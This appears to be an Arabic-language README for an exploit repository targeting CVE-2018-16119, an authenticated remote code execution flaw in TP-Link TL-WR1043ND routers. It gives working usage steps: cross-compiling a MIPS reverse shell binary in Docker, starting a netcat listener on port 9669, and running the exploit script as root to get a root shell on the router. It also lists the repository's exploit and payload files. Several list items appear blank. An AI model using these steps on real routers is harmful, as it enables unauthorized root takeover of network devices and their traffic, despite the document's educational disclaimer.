
TP-Link TL-WR1043ND - تنفيذ تعليمات برمجية عن بعد مع مصادقة
CVE-2018-16119 هو ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد المُصادق عليه تؤثر على أجهزة توجيه TP-Link TL-WR1043ND. تسمح هذه الثغرة للمهاجمين المُصادق عليهم بتنفيذ أوامر اعتباطية على الجهاز المستهدف بصلاحيات الجذر، مما قد يؤدي إلى اختراق كامل للنظام.
تفاصيل CVE: CVE-2018-16119
بمجرد استغلال الثغرة، يحصل المهاجم على وصول إلى شل الجذر على جهاز التوجيه، مما يمكنه من:
# Install required packages
sudo apt-get update
sudo apt-get install netcat docker.io
يتطلب الاستغلال ملفًا ثنائيًا لصدفة عكسية بنظام MIPS كبير-endian. اتبع هذه الخطوات لترجمته:
# Copy the source code to /tmp
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/
# Use Docker container with MIPS cross-compilation tools
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash
داخل حاوية Docker:
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh
اخرج من Docker وانسخ الملف الثنائي المترجم:
cp /tmp/shh exploit/tftp_server/
افتح طرفية وابدأ مستمع netcat على المنفذ 9669:
لينكس:
nc -l -p 9669 -vv
ماك:
nc -l 9669 -vv
شغّل سكربت الاستغلال بصلاحيات الجذر (مطلوب لخادم TFTP):
sudo python3 exploit/exploit.py
سوف يقوم السكربت بـ:
بمجرد إنشاء الاتصال:
CVE-2018-16119/
├── exploit/
│ ├── exploit.py # Main exploit script
│ ├── requirements.txt # Python dependencies
│ ├── notes.txt # Additional notes
│ └── tftp_server/
│ ├── reverse_shell_mipsbe.c # Reverse shell source code
│ └── shh # Compiled MIPS binary
├── firmware/
│ └── wr740nv4_webrevert.bin # Sample firmware
├── squashfs-root/ # Extracted firmware filesystem
└── README.md # This file
تم الإفصاح عن هذه الثغرة بمسؤولية ويجب استخدامها فقط من أجل:
⚠️ تحذير: يتم توفير هذا الاستغلال للأغراض التعليمية والاختبار المصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي. يتحمل المستخدمون مسؤولية ضمان حصولهم على التصريح المناسب قبل استخدام هذه الأداة.
تثبيت متطلبات بايثون:
pip3 install -r exploit/requirements.txt
رفض إذن خادم TFTP:
فشل الاتصال:
لا استجابة من الصدفة:
id أو pwdيوضح هذا البحث ثغرات أمنية حرجة في البرامج الثابتة للأجهزة المضمنة. تسلط الثغرة الضوء على أهمية:
البحث بواسطة: Alejandro Parodi
Twitter: @hdbreaker
LinkedIn: Alejandro Parodi
تم إجراء هذا البحث للأغراض التعليمية ولتحسين أمن الأنظمة المضمنة. يرجى الاستخدام بمسؤولية.